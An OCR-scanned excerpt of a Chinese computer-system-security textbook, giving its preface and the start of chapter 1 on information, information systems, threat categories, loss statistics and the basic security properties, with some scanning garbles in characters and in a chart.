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《计算 机 系统 安全 ) 


计算 机 在 政治 军事、 金融 .商业 等 部 门 的 应 用 越 来 越 广泛 ,社会 对 计算 机 系统 的 依赖 也 
越 来 越 大 ,安全 可 靠 的 计算 机 系统 应 用 已 经 成 为 支撑 国民 经 济 .关键 性 基础 设施 以 及 国防 的 
支柱 ,信息 安全 在 各 国都 受到 了 前 所 未 有 的 重视 。“ 信 息 安全 十 国土 安全 = 国家 安全 " 正 逐 
渐 得 到 社会 的 认同 。 我 国 成 立 了 国家 计算 机 网 络 应 急 处 理 协调 中 心 CNCERT(http:// 
www. cert. org. cn) ,国家 计算 机 病毒 应 急 处 理 中 心 CVERC(http://www. antivirus-china. 
org. cn) ,国家 计算 机 网 络 人 侵 防范 中 心 (http://www. nipc. org. cn) ,信息 安全 国家 重点 实 
验 室 (http://www. is. ac.cn) 等 一 批 国家 级 信息 安全 机 构 。 许 多 高 校 及 科研 院 所 开设 了 信 
息 安全 专业 以 及 “信息 安全 导论 ”“ 计 算 机 系统 安全 "等 相关 课程 。 

计算 机 系统 安全 是 信息 安全 的 关键 内 容 之 一 , 它 已 成 为 计算 机 信息 系统 的 核心 技术 ,也 
是 网 络 安全 的 重要 基础 和 补充 。 学 习 计算 机 系统 安全 ,密码 学 是 理论 基础 ,恶意 代码 和 黑客 
是 重要 的 威胁 源 , 必 须 掌握 其 原理 和 技术 ,操作 系统 安全 数据 库 安全 ,软件 保护 和 数字 版 权 
管理 是 核心 ,访问 控制 ,防火 墙 \ 入 侵 检测 与 防御 以 及 数字 取证 是 实现 计算 机 系统 安全 的 重 
要 技术 和 保障 。 

本 教材 从 计算 机 系统 安全 的 角度 出 发 ,结合 多 年 来 “信息 安全 导论 ”的 教学 经 验 , 根 据 教 
学 需要 不 断 充 实 改进 内 容 , 突 出 了 计算 机 系统 安全 的 概念 ,原理 ,技术 和 应 用 实例 ,反映 了 信 
息 安全 的 最 新 进展 。 第 1 章 介绍 计算 机 信息 系统 与 所 面临 的 威胁 .计算 机 系统 安全 概念 、 体 
系 结构 .安全 模型 ,安全 等 级 标准 、 信 息 资产 风险 评估 等 基础 知识 。 第 2 章 介绍 计算 机 病毒 、 
蠕虫 后门, 木马 .僵尸 网 络 .恶意 移动 代码 等 恶意 代码 的 原理 和 防范 ,并 对 反 病 毒 原理 与 技 
术 加 以 介绍 。 第 3 章 介绍 密码 学 基础 知识 ,对称 密 码 . 公 钥 密 码 . 密 钥 管 理 、 新 型 密码 .信息 
隐藏 与 水 印 ,数据 与 版 权 保护 等 。 第 4 章 详 细 介绍 认证 需要 的 杂凑 函数 .数字 签名 以 及 消息 
认证 .身份 认证 和 实用 的 认证 系统 和 协议 。 第 5 章 介绍 访问 控制 的 模型 .策略 和 实现 ,以 及 
授权 与 审计 跟踪 等 知识 。 第 6 章 从 进程 .内存 ,文件 系统 和 应 用 程序 的 角度 ,介绍 操作 系统 
的 安全 ,安全 OS 的 设计 理论 ` Windows 安全 .UNIX 安全 以 及 设备 安全 等 。 第 7 章 介 绍 软 
件 的 保护 、 破 解 和 逆向 的 原理 和 技术 ,以 及 数字 版 权 管理 (DRM) 技 术 。 第 8 章 详 细 介 绍 黑 
客 及 其 信息 收集 类 .入侵 类 ,欺骗 类 .拒绝 服务 类 的 攻击 ,以 及 木马 植 人 和 网 络 钓鱼 技术 。 第 
9 章 简介 数据 库 系 统 及 其 安全 概念 ,阐述 数据 库 的 管理 系统 安全 数据 安全 (关联 推理 和 隐 
私 保护 ) 和 应 用 系统 安全 等 原理 和 技术 。 第 10 章 介绍 防火 墙 的 基本 知识 .体系 结构 .过 滤 原 
理 与 技术 、 网 闸 以 及 防火 墙 的 配置 与 管理 等 。 第 11 章 介绍 人 侵 检 测 的 概念 ,原理 技术、 实 
现 和 蜜 钠 技 术 以 及 IDS 的 部 署 和 产品 ,并 介绍 和 比较 了 入 侵 防御 系统 原理 和 技术 。 第 12 章 
从 计算 机 犯罪 和 电子 证 据 概念 入手 ,介绍 计算 机 数字 取证 的 原理 和 技术 ,证据 分 析 以 及 反 取 


本 书 概念 清晰 ,理论 和 实践 并 重 , 重 点 突出 。 偏 重 实践 的 书 缺 乏 理论 深度 ,而 偏重 理论 
的 书 很 难 提高 学 生 进 一 步 学 习 的 兴趣 。 本 书 注重 从 原理 和 实践 双重 角度 阐明 计算 机 系统 安 
全 的 知识 ,教会 学 生 一 些 处 理 问 题 的 原理 和 具体 方法 并 用 于 实践 中 ,帮助 加 深 对 比较 抽象 和 
枯燥 的 理论 的 理解 。 

本 书 选材 合理 ,内 容 翔 实 、 全 面 .新 颖 、 深 入 浅 出 。 重 点 阐述 恶意 代码 ,访问 控制 .信息 认 
证 ,操作 系统 数据 库 、 软 件 保 护 与 数字 版 权 等 计算 机 系统 安全 的 基本 概念 ,特别 侧重 阐述 恶 
意 代码 这 把 “威胁 之 剑 ” 的 使 用 和 铸造 .黑客 攻击 等 的 原理 和 技术 。 在 防御 方面 阐述 防火 墙 、 
入 侵 检 测 ,数字 取证 等 理论 和 技术 知识 。 密 码 学 作为 信息 安全 的 基础 ,本 书 曾 述 其 基本 理 
论 , 握 弃 过 时 和 不 过 关 的 内 容 。 总 之 ,本 书 全 面 反映 了 近 几 年 计算 机 系统 安全 领域 的 新 
发 展 。 

作为 “网 络 安全 ”的 基础 ,交叉 内 容 较 少 。 密 码 学 、 黑 客 、 防 火 墙 和 入 侵 检测 等 理论 和 技 
术 也 是 计算 机 系统 安全 需要 的 知识 ,但 侧重 于 方法 ,部署 和 管理 ,需要 的 网 络 专业 知识 较 少 。 
对 于 开设 了 密码 学 的 学 生 , 第 3、4 章 的 部 分 内 容 可 以 选择 讲授 。 

本 书 参 考 了 大 量 的 RFC 文档 (http://www. ietf. org/rfc. html) .美国 国家 标准 技术 研 
究 所 出 版 物 (http://csrc. Nist. Gov/publications) ,也 希望 读者 在 学 习 的 过 程 中 查阅 参考 。 

虽然 经 过 多 次 修改 ,鉴于 水 平 有 限 , 书 中 错漏 难免 ,欢迎 读者 批评 指正 。 本 书 参考 了 大 
量 相关 书籍 ,引用 了 许多 来 自 于 互联 网 的 资料 和 PPT, 但 多 数 资料 没有 版 权 信息 ,无 法 一 一 
列 在 参考 文献 中 , 敬 请 作者 谅解 。 

本 书 不 仅 适合 信息 安全 专业 的 本 科 高 年 级 学 生 学 习 , 也 适合 计算 机 相关 专业 的 其 他 本 
科学 生 和 工程 技术 人 员 学 习 和 参考 ,可 以 作为 “信息 安全 导论 ”“ 信 息 安全 基础 “计算 机 系 
统 安全 "等 相关 课程 的 教材 。 

本 书 的 编写 过 程 受 到 湖南 省 科技 计划 (2011FJ4300、2012FJ3047) 和 湖南 省 教育 厅 科 研 
项 目 (11C0533) 的 资助 。 感 谢 北京 邮电 大 学 杨 义 先 教授 .武汉 大 学 彭 国 军 .王丽娜 教授 在 信 
息 安全 领域 给 予 的 指导 和 支持 。 感 谢 湖南 科技 大 学 计算 机 科学 与 工程 学 院 徐 建 波 教授 、 知 
识 处 理 与 网 络 化 制造 ,湖南 省 重点 实验 室 刘 建 勋 教授 的 支持 ,感谢 钟 小 勇 、 汪 丰 兰 、 类 宇 , 许 
梁 芋 , 李 佳 .宋佳 静 , 符 婷 、 赖 朝 刚 等 人 的 资料 整理 和 绘图 。 感 谢 清华 大 学 出 版 社 对 本 书 出 版 
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第 1 章 计算 机 系统 安全 概述 


1.1 信息 系统 与 信息 安全 


1.1.1 信息 化 及 信息 系统 


1. 信息 与 信息 化 

“信息 "一 词 在 英文 法文, 德 文 .西班牙 文中 均 是 “information”, 日 文中 为 情报”, 我 国 
台湾 称 之 为 “资讯 ”, 我 国 古代 用 的 是 “消息 ”。20 世纪 40 年 代 , 香 农 (C. E. Shannon) 给 出 了 
信息 的 明确 数学 定义 : 信息 是 用 以 消除 随机 不 确定 性 的 东西 (信息 是 肯定 性 的 确认 ;确定 性 
的 增加 ) ,并 提出 信息 量 的 概念 和 信息 炉 的 计算 方法 ,从 而 奠定 了 信息 论 的 基础 。 这 一 定义 
被 人 们 视 为 经 典 性 定义 并 加 以 引用 。 

控制 论 创 始 人 维 纳 (Norbert Wiener) 认 为 “信息 是 人 们 在 适应 外 部 世界 ,并 使 这 种 适应 
反作用 于 外 部 世界 的 过 程 中 , 同 外 部 世界 进行 互相 交换 的 内 容 和 名 称 ”。 它 也 被 作为 经 典 性 
定义 加 以 引用 。 我 国 著名 的 信息 学 专家 钟 义 信教 授 认 为 “信息 是 事物 存在 方式 或 运动 状态 ， 
以 这 种 方式 或 状态 直接 或 间接 的 表述 ”。 美 国信 息 管理 专家 霍 顿 (F. W. Horton) 给 信息 下 
的 定义 是 :“ 信 息 是 为 了 满足 用 户 决 策 的 需要 而 经 过 加 工 处 理 的 数据 .” 简 单 地 说 ,信息 是 经 
过 加 工 的 数据 ,或 者 说 信息 是 数据 处 理 的 结果 。 

根据 近年 来 人 们 对 信息 的 研究 成 果 , 科 学 的 信息 概念 可 以 概括 为 : 信息 是 对 客观 世界 
中 各 种 事物 的 运动 状态 和 变化 的 反映 ,是 客观 事物 之 间 相 互联 系 和 相互 作用 的 表征 ,表现 的 
是 客观 事物 运动 状态 和 变化 的 实质 内 容 。 

信息 是 资源 和 财富 。 信 息 化 的 程度 已 经 成 为 衡量 一 个 国家 或 企业 综合 技术 水 平 、 综 合 
能 力 的 主要 标志 。 从 全 球 范围 来 看 ,发 展 信息 技术 和 发 展 信息 产业 也 是 当今 竞争 的 一 个 制 
高 点 。 信 息 技术 和 信息 产业 正在 改变 人 们 传统 的 生产 ,经营 和 生活 方式 ,信息 已 成 为 社会 发 
展 的 重要 战略 资源 。 

林毅夫 等 指出 :“ 所 谓 信息 化 ,是 指 建立 在 IT 产业 发 展 与 IT 在 社会 经 济 各 部 门 扩散 的 
基础 之 上 ,运用 IT 改造 传统 的 经 济 、 社 会 结构 的 过 程 ”。 

信息 化 在 改变 社会 ,促进 发 展 的 同时 ,给 国家 的 安全 也 带 来 了 挑战 ,常规 起 器 ,核武 器 等 
离开 了 信息 的 精确 制导 ,也 就 变 成 了 睹 子 ,因此 现代 战争 中 出 现 了 争夺 信息 控制 权 的 信息 
战 。 下 面 是 一 些 名 人 对 信息 化 的 评价 。 

美国 著名 未 来 学 家 阿尔 温 ， 托 尔 勒 :“ 谁 掌握 了 信息 ,控制 了 网 络 , 谁 将 拥有 整个 
世界 。” 

美国 前 总 统 克林顿 :“ 今 后 的 时 代 ,控制 世界 的 国家 将 不 是 靠 军事 ,而 是 信息 能 力 走 在 
前 面 的 国家 。” 

江泽民 :“ 信 息 革命 是 人 类 第 三 次 生产 力 的 革命 ,四 个 现代 化 , 哪 一 化 也 离 不 开 信 
息 化 。” 
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2. 信息 化 的 好 处 

信息 及 其 网 络 化 提供 了 信息 资源 的 共享 性 、 用 户 使 用 的 方便 性 、 通 过 分 布 式 处 理 提高 了 
系统 效率 和 可 靠 性 ,并 且 还 具有 扩展 性 。 

信息 化 与 网 络 对 当前 生产 生活 方式 的 革命 体现 在 许多 方面 ,如 新 闻 阅 读 / 天 气 查询 / 校 
友 录 ,资料 搜索 (百度 ,Google 等) ,媒体 下 载 (BT 迅雷、 网 际 快车 等 ) ,在 线 电视 /电影 /收音 
机 (PPLive .QQ 直播 ) ,游戏 (CS/ 红 警 /传奇 / 泡 泡 堂 /植物 僵尸 等 ), 即 时 聊天 (QQ/Skype/ 
MSNVIRC 等 ) ,电子 邮件 (hotmail,sina 等 ), 学 习 交 流 ( 技 术 论 坛 . 网 络 磁盘 、 海 量 数据 存 取 
等 ) ,在 线 工 作 ( 企 业 信息 化 /SOHO 等 ) ,网 上 购物 (淘宝 /eachnet(ebay)/dangdang/ 亚 马 逊 
等 ) 和 网 上 银行 (cmbchina \icbec 等 ) 等 。 这 些 使 人 们 的 现代 生活 和 工作 都 与 网 络 信 息 紧 密 联 
系 在 一 起 ,而 且 由 信息 系统 对 这 些 海量 信息 统一 管理 。 

3. 信息 系统 

信息 系统 (Information System,IS) 是 由 计算 机 硬件 .网 络 和 通信 设备 .计算 机 软件 、 信 
息 资 源 、 信 息 用 户 和 规章 制度 组 成 的 以 处 理 信 息 流 为 目的 的 人 机 一 体 化 系统 ,也 可 定义 为 是 
一 个 由 人 、 计 算 机 及 其 他 外 围 设备 等 组 成 的 能 进行 信息 的 收集 ,传递 ,存储 加工、 维护 和 使 
用 的 系统 。 

《大 英 百 科 全 书 》 对 IS 的 定义 是 : 有 目的 ,和谐 地 处 理 信 息 的 主要 工具 是 信息 系统 , 它 
把 所 有 形态 (原始 数据 .已 分 析 的 数据 ,知识 和 专家 经 验 ) 和 所 有 形式 (文字 、 视 频 和 声音 ) 的 
信息 进行 收集 组织, 存储、\ 处 理 和 显示 。 

计算 机 信息 系统 (Computer Information System) 是 由 计算 机 及 其 相关 的 和 配套 的 设备 
( 含 网 络 ) 构 成 的 ,并 按 一 定 的 应 用 目标 和 规则 对 信息 进行 采集 加工、 存储、 传输 .检索 等 处 
理 的 人 机 系统 。 

社会 对 信息 系统 的 依赖 日 益 增 强 ,信息 系统 已 成 为 社会 发 展 的 重要 保证 。 信 息 系 统 有 
5 个 基本 功能 : 输入 、 存 储 、 处 理 、 输 出 和 控制 。 信 息 系统 的 输入 功能 决定 于 系统 所 要 达到 
的 目的 及 系统 的 能 力 和 信息 环境 的 许可 ;信息 系统 的 存储 功能 指 的 是 系统 存储 各 种 信息 资 
料 和 数据 的 能 力 ;信息 系统 的 处 理 功能 可 基于 数据 仓库 技术 的 联机 分 析 处 理 (OLAP) 和 数 
据 挖掘 CDM) 技术 来 处 理 数据 ;信息 系统 的 各 种 功能 都 是 为 了 保证 最 终 实现 最 佳 的 输出 功 
能 ;控制 功能 对 构成 系统 的 各 种 信息 处 理 设 备 进行 控制 和 管理 ,对 整个 信息 加 工 、 处 理 、 传 
输 ,输出 等 环节 通过 各 种 程序 进行 控制 。 


1.1.2 信息 的 安全 威胁 


1. 信息 化 带 来 的 问题 

尽管 信息 化 带 来 了 许多 好 处 ,改变 了 人 们 的 生产 和 生活 ,但 是 随 之 而 来 出 现 了 各 种 新 问 
题 ,互联 网 下 的 计算 机 信息 系统 受到 极 大 的 安全 威胁 。 

例如 ,网 上 信息 可 信 度 差 .机 密 信息 随意 被 泄露 曝光 、 垃 圾 电子 邮件 .计算 机 与 网 络 遭 到 
病毒 攻击 等 ;个 人 隐私 泄露 /机 密 文 件 被 公开 ,网 络 色 情 泛滥 ,网 络 敲诈 勒索 ,网 络 通信 被 监 
控 , 黑 客 攻击 (计算 机 被 远程 监控 /机 密 信息 失窃 /网 站 被 修改 /网 站 无 法 提供 正常 服务 
DDoS 等 ) ,虚假 新 闻 、 网 络 水 军 、 五 毛 党 ,假冒 速递 网 站 骗 钱 ,个 人 身份 被 次 用 (Email/QQ 
等 ) ,网 络 钓鱼 (Phishing, 利 用 坎 骗 性 的 E-mail 和 伪造 的 Web 站 点 进行 诈骗 活动 ,使 受骗 者 
泄露 自己 的 重要 信息 ,如 信用 卡号 .用户 名 和 口令 等 ) 。 
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FBI/CSI 对 484 家 公司 调查 发 现 : 超过 85% 的 安全 威胁 来 自 企 业内 部 ,16% 来 自 内 部 
未 授权 的 存 取 ,14% 专 利信 息 被 窃取 ,12% 内 部 人 员 的 财务 欺骗 ,11% 资 料 或 网 络 的 破坏 。 
图 1.1 是 2004 年 美国 FBI/CSI 对 计算 机 犯罪 与 企业 损失 的 调查 图 。 


Sabotage |] $871 oob 一 了 | 乱 工 、 划 意 破坏 

系统 渗透 -一 System penetration |] $901 500 

Web site defacement || S958 100 一 一 | “Web 页 面 替 换 

公共 Web 应 用 的 滥用 | 一 Misuse of public Web application | |$2 747 000 
Telecom fraud | 了]$3 997 500 一 -电信 卜 诈 

非 授权 访问 上 一 Unauthorized acCeSS $4 278 205 

Laptop theft | “$6 734 500 汪 -电脑 盗窃 

金融 欺诈 | 一 Financial faud [5]$7 670 500 

Abuse of wireless network $10 159 250 一 一 | | 无 线 网 络 的 滥用 


内 部 网 络 的 滥用 | Insider Net abuse $10 601|055 
Theft of proprietary info $11 460 000 一 下 私有 信息 窃取 


拒绝 服务 攻击 上 一 Denial of service $26 064050| 354053900 


病毒 事件 FVins 
I I I 
0 10M 20M 30M 40M 50M 60M 
Total Losses for 2004-$141 496 560 
CSUFBI 2004 Computer Crime and Security Survey 2004; 269 Respondents 


Source: Computer Security Institute 


图 1.1 2004 年 FBI/CSI 做 的 企业 损失 调查 图 


美国 AS 联合 会 调查 ,美国 每 年 因 信息 安全 犯罪 产生 的 损失 高 达 150 亿美 元 。2002 年 
2 月, 一个“ 下载 大 腕 ”的 国际 性 黑客 组 织 成 功 交 人 了 美国 军 方 的 中 枢 电 脑 信息 库 “ 五 角 大 楼 
防务 信息 网 络 系统 ”。2005 年 7 月 14 日 ,英国 一 名 黑客 McKinnon 表示 他 能 够 入 侵 美 国 国 
防 部 网 站 。2011 年 4 月 ,黑客 从 索尼 在 线 PlayStation 网 络 中 窃取 了 7700 万 客户 的 信息 , 包 
括 信用 卡 账号 ,导致 索尼 被 迫 关闭 了 该 服务 并 损失 了 1.7 亿美 元 。 同 年 6 月 ,美国 花旗 银行 
系统 被 黑客 侵 和 人 ,21 万 北美 地 区 银行 卡 用 户 的 姓名 、 账 户 . 电 子 邮 箱 等 信息 可 能 被 泄露 。 
2012 年 4 月 ,生活 在 纽约 的 31 岁 俄 罗斯 公民 Petr Murmylyuk 被 指控 入 侵 Fidelity、 
Scottrade、E* Trade 和 Schwab 等 证 券 公司 中 的 账户 ,进入 未 授权 交易 。 

2. 信息 的 安全 威胁 概念 

信息 的 安全 威胁 是 指 对 安全 的 一 种 潜在 的 侵害 。 威 胁 来 自 多 方面 ,并 且 随 时 间 而 变化 。 
威胁 的 实施 称 为 攻击 。 一 般 认 为 ,目前 计算 机 系统 安全 面临 的 威胁 主要 有 三 种 : 信息 泄露 、 
拒绝 服务 和 系统 破坏 。 其 中 任意 一 种 威胁 还 可 能 造成 其 他 另 一 种 威胁 。 

(1) 信息 泄露 。 指 敏感 数据 在 有 意 或 无 意 中 被 泄露 或 丢失 。 通 常 包 括 信息 在 使 用 和 传 
输 中 丢失 或 者 泄露 ,被 未 授权 的 他 人 所 获得 。 如 计算 机 系统 中 的 机 密 数据 被 人 复制 窃取 ,或 
者 利用 电磁 泄露 或 搭 线 窃听 等 方式 截获 ,或 通过 对 信息 流向 、 流 量 . 通 信 频 度 和 长 度 等 参数 
的 分 析 推 测 出 机 密 信 息 ,等 等 。 

(2) 系统 破坏 。 以 非法 手段 取得 对 计算 机 系统 的 访问 权 , 恶 意 占 用 计算 机 系统 运行 所 
需 的 软 硬 件 资源 ,使 系统 不 能 正常 顺畅 运行 ;恶意 添加 、 删 除 、 修 改 数据 ,以 干扰 用 户 的 正常 
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使 用 ;或 从 系统 外 部 直接 攻击 运行 设备 ,使 硬件 设备 停止 工作 。 

(3) 拒绝 服务 。 通 过 网 络 干扰 或 破坏 ,改变 计算 机 系统 的 正常 服务 作业 流程 ,使 系统 响 
应 减 慢 甚至 瘫痪 ,影响 正常 用 户 的 系统 服务 获取 ,甚至 拒绝 为 合法 用 户 服务 。 

3. 安全 威胁 的 攻击 模式 

实施 对 信息 系统 的 侵害 行为 或 攻击 按 目标 大 体 上 分 为 两 类 : 一 类 是 对 信息 载体 的 攻 
击 , 另 一 类 是 对 信息 本 身 的 攻击 。 信 息 载体 攻击 是 指 对 计算 机 及 其 外 部 设备 和 网 络 的 攻击 ; 
信息 攻击 是 指 在 信息 的 使 用 和 传输 过 程 中 对 信息 本 身 进 行 攻击 ,分 为 信息 泄露 和 信息 破坏 
两 种 。 目 前 的 几 种 攻击 模式 为 中 断 、 截 取 / 窃 听 、 算 改 和 捏造 ,如 图 1. 2 所 示 。 攻 击 类 型 从 安 
全 属性 的 观点 分 为 阻 断 攻击 、 截 取 攻 击 、 自 改 攻击 和 伪造 攻击 4 类 ,从 攻击 方式 分 为 被 动 攻 
击 和 主动 攻击 两 类 ,从 攻击 目的 和 效果 分 为 访问 攻击 、 自 改 攻击 拒绝 服务 和 否认 攻击 4 类 。 


信息 的 正常 流动 : 
(D) 中 断 : 


(3) 修 改 : 信 源 一 去 (四 
修改 的 
(4) 捍 造 : 信 源 


信息 


图 1.2 几 种 信息 的 攻击 模式 


信息 在 使 用 和 传输 的 过 程 中 可 能 因 偶然 或 故意 的 原因 遭 到 泄露 或 破坏 ,信息 破坏 会 使 
信息 的 完整 性 和 可 用 性 受到 损失 ,如 系统 的 信息 被 修改 ,删除 ` 添 加 、 伪 造 或 非法 复制 ,造成 
信息 的 破坏 、 修 改 或 丢失 。 

4. 信息 的 安全 威胁 分 类 

(1) 从 威胁 的 来 源 看 ,可 分 为 内 部 威胁 和 外 部 威胁 。 信 息 系统 的 安全 威胁 有 可 能 来 自 
系统 外 部 ,也 有 可 能 来 自 内 部 。 

人 内 部 威胁 。 内 部 人 员 对 机 构 的 运作 和 结构 比较 熟悉 ,所 进行 的 攻击 不 易 被 发 觉 ;内 
部 人 员 最 容易 接触 敏感 信息 ,危害 的 往往 是 机 构 最 核心 的 数据 ,资源 等 。 加 强 内 部 审计 , 制 

完善 的 安全 策略 ,增强 访问 控制 可 以 提高 检测 出 这 种 攻击 的 可 能 性 。 

@ 外 部 威胁 。 外 部 威胁 的 实施 主要 是 远程 攻击 ,如 嗅 探 窃 听 、 截 取 , 假 冒 为 系统 的 授权 
用 户 或 系统 的 组 成 部 分 欺骗 系统 认证 ,为 鉴别 或 访问 控制 机 制 设置 旁 路 ,利用 系统 漏洞 攻 
击 , 等 等 。 
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(2) 从 威胁 的 过 程 看 ,可 以 分 为 被 动 威胁 和 主动 威胁 。 

人 被 动 威胁 。 指 一 切 以 窃 密 为 目的 使 信息 非 授权 泄露 的 威胁 , 它 未 改变 系统 状态 ,在 
不 干扰 系统 正常 工作 的 情况 下 侦 收 、 截 获 .窃取 系统 信息 ,以 便 分 析 破 译 。 它 的 特点 是 偷 听 
或 监视 传送 。 例 如 利用 观察 信息 ,控制 信息 的 内 容 来 获得 目标 系统 的 位 置 和 身份 ,利用 信息 
长 度 和 传递 的 频 度 获得 信息 的 某 些 性 质 。 被 动 攻击 不 容易 被 用 户 察觉 ,因此 攻击 的 持续 性 
和 危害 性 都 很 大 。 主 要 方法 有 直接 侦 收 、 截 获 、 合 法 窃取 、 破 译 分 析 、 挖 掘 遗 弃 媒 体 信息 。 

@ 主动 威胁 。 这 种 威胁 是 对 系统 的 状态 进行 非 授 权 的 改变 操作 或 对 系统 信息 进行 非 
授权 的 算 改 。 它 不 仅 能 窃 密 , 而 且 还 威胁 到 信息 的 完整 性 ,可 以 有 选择 地 修改 ,删除 ,添加 、 
伪造 和 重 排 信息 内 容 , 造 成 信息 破坏 。 例 如 路 由 选择 表 的 非 授 权 改写 。 主 要 方法 有 系统 人 
侵 . 干 扰 窃取 、 和 代 改 消息 ,返回 渗透 , 重 发 消息 ,插入 伪 消 息 , 重 放 \ 阻 塞 .抵赖 ,病毒 .冒充 已 授 
权 实 体 以 及 拒绝 服务 等 。 

被 动 攻击 很 难 检测 出 但 可 预防 ,主动 攻击 易 检测 出 但 难 预防 。 防 止 主 动 攻击 的 做 法 是 
对 攻击 进行 检测 ,并 从 它 引起 的 中 断 或 延迟 中 恢复 过 来 。 检 测 具有 威慑 的 效果 。 

(3) 从 威胁 的 动机 上 看 ,分 为 偶发 威胁 和 故意 威胁 。 

Q@ 偶发 威胁 。 偶 发 威胁 是 指 那些 不 带 预 谋 企 图 的 威胁 。 偶 发 威胁 的 实例 包括 自然 灾 
害 、 系 统 故障 ,操作 失误 和 软件 出 错 。 

@ 故意 威胁 。 故 意 威 胁 是 指 对 计算 机 系统 的 有 意图 、 有 目的 的 威胁 。 范 围 可 从 使 用 简 
易 监 视 工 具 进行 随意 的 检测 到 使 用 特别 的 系统 工具 实施 精心 设计 的 攻击 。 

5. 信息 的 安全 威胁 来 源 

信息 的 安全 威胁 可 能 来 自 各 方面 。 影 响 、 危 害 信息 系统 安全 的 因素 分 为 自然 和 人 为 
两 类 。 

自然 因素 包括 各 种 自然 灾害 ,如 水 、 火 、 雷 、 电 、 风 暴 、 烟 人 尘 、 虫 害 、 鼠 害 、 海 哺 和 地 震 等 。 
系统 的 环境 和 场地 条 件 , 如 温度 ,湿度 、 电 源 、 地 线 和 其 他 防护 设施 不 良 造成 的 威胁 ;电磁 辐 
射 和 电磁 干扰 的 威胁 ;硬件 设备 自然 老化 .可 靠 性 下 降 的 威胁 等 。 这 些 都 可 能 导致 物理 设备 
的 直接 损坏 ,影响 计算 机 系统 的 正常 运行 。 

人 为 因素 主要 有 无 意 失 误 、 恶 意 攻击 和 系统 软件 的 漏洞 三 个 方面 。 

无 意 失误 包括 操作 失误 (系统 操作 不 当 、 误 用 媒体 、 设 置 不 当 ) .无 意 破坏 (无 意 损坏 、 意 
外 删除 等 ) 管理 不 善 (维护 不 力 、 管 理 松弛 ) 、 意 外 丢失 (被 盗 被 欺骗 ,被 非法 复制 .丢失 媒 
体 ) 和 意外 损失 (电力 设备 干扰 、 受 损 )。 

恶意 攻击 包括 对 手 、 黑 客 的 故意 违反 规则 的 操作 ,敌对 势力 的 恶意 攻击 和 各 种 计算 机 犯 
罪 。 人 为 的 恶意 攻击 是 目前 计算 机 系统 所 面临 的 最 大 威胁 。 人 为 攻击 又 可 以 分 为 两 类 : 一 
类 是 主动 攻击 , 它 以 各 种 方式 有 选择 地 破坏 系统 和 数据 的 有 效 性 和 完整 性 ; 另 一 类 是 被 动 攻 
击 , 它 是 在 不 影响 应 用 系统 和 网 络 正常 运行 的 情况 下 ,进行 截获 .窃取 、 破 译 以 获得 重要 机 密 
信息 。 这 两 种 攻击 均 可 对 计算 机 系统 造成 极 大 的 危害 ,导致 系统 瘫痪 或 机 密 泄露 。 

系统 漏洞 包括 软件 的 编程 缺陷 (经 验 不 足 ,检查 漏 项 .不 兼容 文件 ) ,容错 不 够 .缺乏 访问 
控制 ,配置 不 当 , 编 程 人 员 设 置 的 方便 “后 门 ”等 。 这 些 形成 系统 漏洞 ,成 为 系统 威胁 的 主要 
来 源 。 图 1. 3 是 FBI/SCI 的 信息 安全 事件 原因 调查 图 。 
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未 修补 或 防范 软件 漏洞 
60% 图 网 络 或 软件 配置 错误 

国 登录 密码 过 于 简单 或 未 修改 
缺少 访问 控制 

国 攻击 者 使 用 拒绝 服务 攻击 
圆 攻击 者 利用 软件 默认 设置 
30% 站 | 利用 内 部 用 户 安全 管理 
2% | 国 刘 天 雪人 pk 
图 攻击 者 使 用 欺诈 方法 

国 其 他 

国 不 明 原因 


图 1.3 引发 信息 安全 事件 的 主要 原因 ( 自 左 至 右 的 柱状 对 应 自 上 而 下 的 说 明 ) 


1.1.3 信息 安全 


1. 信息 安全 概念 

安全 的 基本 含义 客观 上 不 受 威胁 ,主观 上 不 存在 恐惧 。 信 息 安 全 的 狭义 定义 是 指 具 体 
的 信息 技术 系统 的 安全 ,或 指 某 一 特定 信息 系统 的 安全 。 定 义 的 优点 是 内 容 具体 形象 ,便于 
理解 和 应 用 ;缺点 则 是 过 于 狭窄 。 广 义 定义 是 指 一 个 国家 的 社会 信息 化 状态 不 受 外 来 的 威 
胁 和 伤害 ,一 个 国家 的 信息 技术 体系 不 受 外 来 的 威胁 和 侵害 。 

ISO 定义 信息 安全 是 为 数据 处 理 系统 建立 和 采取 的 技术 和 管理 的 安全 保护 ,保护 计算 
机 硬件 .软件 和 数据 不 因 偶 然 和 恶意 的 原因 而 遭 到 破坏 .更 改 和 显露 。 

信息 安全 (Information Security) 是 指 对 信息 的 机 密 性 (Confidentiality)、 完 整 性 
(Integrity) 和 可 用 性 (Availability) 的 保持 。 另 外 还 可 以 加 上 可 控 性 和 不 可 否认 性 。 

机 密 性 是 指 保障 信息 仅 供 被 授权 者 获取 和 使 用 而 不 泄露 给 非 授权 实体 的 特性 。 

完整 性 是 指 信息 在 使 用 、 存 储 和 传输 过 程 中 未 经 授权 不 能 被 改变 的 特性 。 一 方面 是 指 
信息 在 利用 ,传输 .储存 等 过 程 中 不 被 算 改 、 丢 失 和 缺损 等 ; 另 一 方面 是 指 信息 处 理 的 方法 的 
正确 性 。 

可 用 性 是 指 信 息 能 够 随时 被 授权 实体 访问 并 按 要 求 使 用 ,信息 系统 能 以 人 们 所 接受 的 
质量 水 平 持续 运行 ,为 人 们 提供 有 效 的 信息 服务 的 特性 。 

可 控 性 是 指 对 网 络 信息 的 传播 及 内 容 具 有 控制 和 管理 能 力 的 特性 。 

不 可 否认 性 是 指 对 出 现 的 信息 安全 纠纷 (如 抵赖 ) 提 供 调查 的 依据 和 手段 的 特性 。 

2. 典型 的 信息 安全 威胁 

信息 的 安全 有 下 面 几 种 典型 的 威胁 。 

(1) 假冒 。 假冒 是 指 通 过 出 示 伪 造 的 凭证 来 冒充 别 的 合法 用 户 ,进入 系统 盗窃 信息 或 
进行 破坏 。 假 冒 攻击 的 表现 形式 主要 有 盗窃 密 钥 .访问 明码 形式 的 口令 或 者 记录 授权 序列 
并 在 以 后 重 放 。 假 冒 具 有 很 大 的 危害 性 ,因为 它 利 用 了 用 于 结构 化 授权 访问 的 信任 关系 。 
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假冒 常 与 某 些 别 的 主动 攻击 形式 一 起 使 用 ,特别 是 消息 的 重 放 与 算 改 (伪造 ), 构 成 对 用 
户 的 诈骗 。 假 冒 给 系统 带 来 极 大 的 危害 , 穷 取 了 合法 用 户 的 利益 并 损坏 了 其 声誉 。 这 是 渗 
人 某 个 安全 防线 的 最 为 通用 的 方法 。 

(2) 旁 路 控制 。 为 了 获得 未 授权 的 权利 和 特权 ,攻击 者 发 所 系统 的 缺陷 或 安全 脆弱 性 ， 
